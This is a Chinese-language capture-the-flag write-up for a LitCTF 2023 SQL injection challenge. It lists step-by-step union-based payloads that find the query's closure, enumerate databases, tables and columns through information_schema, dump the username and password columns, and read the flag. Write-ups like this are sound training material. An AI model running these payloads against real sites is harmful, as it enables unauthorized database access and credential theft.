[LitCTF 2023]这是什么?SQL !注一下 !

[LitCTF 2023]这是什么?SQL !注一下 ! wp

题目描述:为了安全起见多带了几个套罢了o()q

页面内容(往下滑):

SQL 语句已给出,无非是更换了闭合方式。

先输个 1 试试:

在下面的回显中将 SQL 语句与执行结果都回显了出来。

测试闭合方式与注释符

假如闭合方式与注释符都正确,那么输入以下内容,应当与输入 1 得到一样的结果:

复制代码
1))))))--+

经过测试:闭合方式为 )))))) ,注释符为 --+ 时可以正确执行。

group by 查询回显位数

复制代码
1)))))) group by 2--+

经过测试,回显位为两位。

输入:

复制代码
1)))))) union select 1,2--+

返回结果:

经过测试,两位都能正常回显。

查询当前数据库名

复制代码
1)))))) union select 1,database()--+

返回结果:

当前数据库名为 ctf 。

查询当前数据库中的所有表

复制代码
1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

返回结果:

只有一个 users 表。

查询表中的所有列

复制代码
1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"--+

返回结果:

有三列,分别是:id,username,password

查询列中的所有内容

复制代码
-1)))))) union select username,password from users--+

返回结果:

fake_flag 意为 假的 flag 。可见,这里面并没有 flag 。那么应该在其它数据库中。

select 查询所有数据库

使用 show 查询的时候不知道为什么出不来,只好用 select 查询了。

复制代码
-1)))))) union select 1,schema_name from information_schema.schemata--+

返回结果:

除了 ctf 之外还有一个名为 ctftraining 的数据库。进去看看。

查询 ctftraining 数据库的所有表名、列名

查询 ctftraining 数据库的所有表名:

复制代码
-1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctftraining"--+

返回结果:

有一个名为 flag 的表。

查询 flag 表的所有列名:

复制代码
-1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name="flag"--+

返回结果:

在 flag 表中有一个名为 flag 的列名。

查询 flag 列的所有内容:

复制代码
-1)))))) union select 1,flag from ctftraining.flag--+

返回结果:

拿到 flag 。

相关推荐
渣渣盟1 小时前
掌握MySQL函数:高效数据处理指南
sql·mysql·adb·dba
??? Meggie2 小时前
【SQL】使用UPDATE修改表字段的时候,遇到1054 或者1064的问题怎么办?
android·数据库·sql
工藤学编程2 小时前
分库分表之实战-sharding-JDBC绑定表配置实战
数据库·分布式·后端·sql·mysql
在安全厂商修设备5 小时前
SQL注入与防御-第六章-3:利用操作系统--巩固访问
sql·web安全·网络安全
He.ZaoCha6 小时前
函数-3-日期函数
数据库·sql·mysql
工藤学编程7 小时前
分库分表之实战-sharding-JDBC水平分库+分表后:查询与删除操作实战
数据库·spring boot·后端·sql·mysql
情分丶9 小时前
中国蚁剑使用方法
网络安全
王天天(Bennet)10 小时前
【防火墙基础之传统墙到 UTM 到 NGFW 再到 AI 的变化】
人工智能·网络安全·防火墙·ngfw·防火墙发展与认知
好奇的菜鸟16 小时前
Spring Boot 事务失效问题:同一个 Service 类中方法调用导致事务失效的原因及解决方案
数据库·spring boot·sql
2501_9160088919 小时前
iOS App抓包工具排查后台唤醒引发请求异常
websocket·网络协议·tcp/ip·http·网络安全·https·udp